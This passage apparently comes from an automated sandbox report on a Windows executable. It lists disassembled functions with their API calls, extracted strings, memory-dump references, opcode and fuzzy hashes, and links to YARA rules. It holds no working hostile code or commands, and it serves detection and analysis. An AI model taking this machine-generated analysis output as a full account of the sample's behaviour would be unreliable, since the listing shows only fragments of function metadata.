                                                                                                                                                                          • _memset.LIBCMT ref: 0043E2A0
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000138,?,00000000), ref: 0043E2C3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043E2CD
                                                                                                                                                                          • _memset.LIBCMT ref: 0043E36E
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 0043E38B
                                                                                                                                                                          • _memset.LIBCMT ref: 0043E3DD
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0043E3F7
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043E401
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileRead_memset$ErrorLast$H_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2677393532-0
                                                                                                                                                                          • Opcode ID: fa483f4611888ab421b93dffb73c9f36681cf847687b27d0c4995cc2daf99527
                                                                                                                                                                          • Instruction ID: 3118cc53abb2b50cd5bdc6bae3776db024a04edf275fc3e48fb7e4218d5ae2be
                                                                                                                                                                          • Opcode Fuzzy Hash: fa483f4611888ab421b93dffb73c9f36681cf847687b27d0c4995cc2daf99527
                                                                                                                                                                          • Instruction Fuzzy Hash: 23513AB5901618EBDB50DF65CC81ADEB7B8FF08314F4011AAF509E3291E734AA91CF69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00430268, Relevance: 13.6, APIs: 9, Instructions: 109COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00430272
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,000003E8,?,00000064), ref: 004302C1
                                                                                                                                                                          • GetDlgItem.USER32 ref: 004302CE
                                                                                                                                                                            • Part of subcall function 004301B4: wsprintfW.USER32 ref: 004301E3
                                                                                                                                                                            • Part of subcall function 004301B4: lstrcmpW.KERNEL32(?,?), ref: 004301F7
                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 004302F1
                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 004302FC
                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00430310
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00430326
                                                                                                                                                                          • SetWindowTextW.USER32(?,-00000004), ref: 004303A3
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004303BF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemWindow$DialogEnableText$H_prolog3_lstrcmpwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2161687695-0
                                                                                                                                                                          • Opcode ID: c11b07fb4e2316786f212a3facd00a7995038b04ea01408d2d35127a5b7204f0
                                                                                                                                                                          • Instruction ID: fd87fe56ddcb3b4ff6ccbb0735829bf1d2879eccf5f0b42d184dea51d1f05ce0
                                                                                                                                                                          • Opcode Fuzzy Hash: c11b07fb4e2316786f212a3facd00a7995038b04ea01408d2d35127a5b7204f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 25310830640614ABE714EF60DC5AFAF3725AF19305F004266FE46A72D1EBB88E45CB6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456618, Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 303COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00456908
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00456622
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 004561BD: __EH_prolog3_GS.LIBCMT ref: 004561C7
                                                                                                                                                                            • Part of subcall function 004561BD: GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileW,00000254,00455824), ref: 004561E3
                                                                                                                                                                            • Part of subcall function 004561BD: GetProcAddress.KERNEL32(00000000), ref: 004561E6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString$AddressCloseFindH_prolog3HandleModuleProc
                                                                                                                                                                          • String ID: *.*$HsG$HsG$HsG$HsG
                                                                                                                                                                          • API String ID: 2006274578-1225694355
                                                                                                                                                                          • Opcode ID: 8918d52ada21b167e46a545bcc20575e4bf1ad7964de139b8228515acf73f200
                                                                                                                                                                          • Instruction ID: 1dd474b9d3d906389da787ddd456f26d5ddca9abeb7c66c366164bab47a44278
                                                                                                                                                                          • Opcode Fuzzy Hash: 8918d52ada21b167e46a545bcc20575e4bf1ad7964de139b8228515acf73f200
                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED17071800218EBDF20DFA5CC55BDEBBB4AF15308F50409EE80967292DB795A89CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004164AF, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 287COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_memsetwsprintf
                                                                                                                                                                          • String ID: Referer: %s$dwplayer
                                                                                                                                                                          • API String ID: 1359275013-1303060843
                                                                                                                                                                          • Opcode ID: e31709d3bb09551a4ba733ee6102951959d8b764da79b813c73f30cc038f169d
                                                                                                                                                                          • Instruction ID: e3bd5a7c1a9d1afb8a7d84a7a58966ad12226142b114bfca8ff89fbd602b2109
                                                                                                                                                                          • Opcode Fuzzy Hash: e31709d3bb09551a4ba733ee6102951959d8b764da79b813c73f30cc038f169d
                                                                                                                                                                          • Instruction Fuzzy Hash: BDC18D70A042989FDF20DF64C844BE9BBB5AF44348F1141DAE489E7291DBB89EC4CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00423D76, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00423D80
                                                                                                                                                                          • GetVersionExW.KERNEL32(?,000001FC,0042AD0E,00477284,?,00000000,00000001,00000000,00000000,dotnetfx.exe,?,00000001,isnetfx.exe,?,00000001,000001D4), ref: 00423DA1
                                                                                                                                                                          • _wcscmp.LIBCMT ref: 00423DD4
                                                                                                                                                                          • _wcscmp.LIBCMT ref: 00423F53
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcscmp$H_prolog3_Version
                                                                                                                                                                          • String ID: 0$HsG$dotnetfxsp1.exe
                                                                                                                                                                          • API String ID: 158289-2839601481
                                                                                                                                                                          • Opcode ID: ecd7b9e558f856dfceae397d46f02584ec0904e5d6ab654a70742477b02d1a6e
                                                                                                                                                                          • Instruction ID: 02d9f5a144390a134f90cd795ecbddfc4b1a5f17212265e5c245f28dc841bedd
                                                                                                                                                                          • Opcode Fuzzy Hash: ecd7b9e558f856dfceae397d46f02584ec0904e5d6ab654a70742477b02d1a6e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0551A071900229DADB20DBA5DD55BEEBB78AB11308F5040EFE409B3182DB780F89CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455724, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004557C3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455882
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 004558F2
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00455907: __EH_prolog3_catch_GS.LIBCMT ref: 00455911
                                                                                                                                                                            • Part of subcall function 00455907: __CxxThrowException@8.LIBCMT ref: 004559D0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$Exception@8Throw$H_prolog3H_prolog3_H_prolog3_catch_
                                                                                                                                                                          • String ID: $HsG$HsG
                                                                                                                                                                          • API String ID: 3135901474-3023446174
                                                                                                                                                                          • Opcode ID: 9ce491e7070547b28ae08ae1e04f072145ebf2dc362ad7093cc3bd8079c2d61c
                                                                                                                                                                          • Instruction ID: b0d3dbac768884ead2b93985f1d779266919649e73a2972554d10ac1522e8d60
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ce491e7070547b28ae08ae1e04f072145ebf2dc362ad7093cc3bd8079c2d61c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2651F470800208DADB14EBB4C8A57ED7B64AF05358F44419FFC4A672E3E7384A8DCB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043DEA6, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043DEAD
                                                                                                                                                                          • VirtualQuery.KERNEL32(?,0043E082,0000001C,0000004C,0043E082,00000008,?,0043EBF5,8DF633FF,?,?,?,0043E0EF,0043EBF5,?,00000008), ref: 0043DED9
                                                                                                                                                                            • Part of subcall function 0043E11F: CompareStringA.KERNEL32(00000400,00000001,?,00000008,00000008,000000FF,DA3EE8FF,00000000,0043EBF5,?,0043DEF5,.debug,0043EBF5,?,0043E0EF,0043EBF5), ref: 0043E147
                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,0043E0EF,0043EBF5,?), ref: 0043DF8E
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,?,0043E0EF,?,?,0043E0EF,0043EBF5,?), ref: 0043DFB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CompareFileH_prolog3InfoQueryStringSystemViewVirtual
                                                                                                                                                                          • String ID: .debug$.rdata$.text
                                                                                                                                                                          • API String ID: 3690134103-733372908
                                                                                                                                                                          • Opcode ID: 8797528110da42d44ba166f713ca4935dad7430a785de0d5c75df3c39d401016
                                                                                                                                                                          • Instruction ID: 14cd16ce59270cd654d7064bb06bb805502fb9a05a4c1a2a6b26d35be1cb364b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8797528110da42d44ba166f713ca4935dad7430a785de0d5c75df3c39d401016
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E418271A0060A9FDB04DF94D885EAEB7B2FF88314F25811BE915A7381DB74ED50CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00458D83, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00458D8A
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00459249: __EH_prolog3.LIBCMT ref: 00459250
                                                                                                                                                                          • LoadTypeLib.OLEAUT32(?,?), ref: 00458DFF
                                                                                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00458E19
                                                                                                                                                                          • RegOverridePredefKey.ADVAPI32(80000000,00000000), ref: 00458EBB
                                                                                                                                                                            • Part of subcall function 00458F45: GetVersionExW.KERNEL32(?), ref: 00458F69
                                                                                                                                                                            • Part of subcall function 00454E9F: RegOverridePredefKey.ADVAPI32(80000000,?), ref: 00454ED7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3$ErrorLastOverridePredefType$LoadRegisterVersion
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3828359244-1835203436
                                                                                                                                                                          • Opcode ID: ebf2625942d6bcb99a9345f142df2c3caf6a8d27f446bb07a1204190344a18e1
                                                                                                                                                                          • Instruction ID: 464651685bd1a6c3155460d26d6a3f4eb557c906968accb782a47857bed2d2d5
                                                                                                                                                                          • Opcode Fuzzy Hash: ebf2625942d6bcb99a9345f142df2c3caf6a8d27f446bb07a1204190344a18e1
                                                                                                                                                                          • Instruction Fuzzy Hash: FA416070500205EFDF04DFA5C849AAD3BB8AF04309F50805EFC19EB252DB79D949CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00418404, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041840E
                                                                                                                                                                            • Part of subcall function 0045FC5E: __EH_prolog3.LIBCMT ref: 0045FC65
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          • _memmove.LIBCMT ref: 004184E2
                                                                                                                                                                          • _memmove.LIBCMT ref: 00418502
                                                                                                                                                                          • GetWindowDC.USER32(00000000), ref: 0041850C
                                                                                                                                                                          • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 00418524
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0041854F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$BitmapCreateH_prolog3H_prolog3_ReleaseWindow_malloc
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 2267778706-3887548279
                                                                                                                                                                          • Opcode ID: 367104b1cd412e7b3a6893bd0c6b1cfdcf4a11267bcebaba29ed9f3e24280cd1
                                                                                                                                                                          • Instruction ID: fb4f99afd84b0f907d7861aec64ad6a5bd2aa5599f925c5186c034417dc8d7b0
                                                                                                                                                                          • Opcode Fuzzy Hash: 367104b1cd412e7b3a6893bd0c6b1cfdcf4a11267bcebaba29ed9f3e24280cd1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E415E71900218AFEB10DF65DC41BE9B7B9FF08314F1081AAE959E7292EB349E85CF14
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041712C, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00417136
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00457832: __EH_prolog3_GS.LIBCMT ref: 0045783C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorLast$H_prolog3$FreeString
                                                                                                                                                                          • String ID: .ini$0x%04x$FontName$HsG$Properties$Tahoma
                                                                                                                                                                          • API String ID: 827811706-850740382
                                                                                                                                                                          • Opcode ID: fdfd06e8ecd6a9732af9fd90d4a5b28dfa5bf38a83cc554309ea2d2123844723
                                                                                                                                                                          • Instruction ID: 775deb45edc7f7391d3edcdeaf5dfb08b63dbc7e7b174a3195c9b64196af171b
                                                                                                                                                                          • Opcode Fuzzy Hash: fdfd06e8ecd6a9732af9fd90d4a5b28dfa5bf38a83cc554309ea2d2123844723
                                                                                                                                                                          • Instruction Fuzzy Hash: F041E671D04258EACB10EBA5CC46BDEBB78AF55304F40409EF445B7182DBB84B48CBE5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

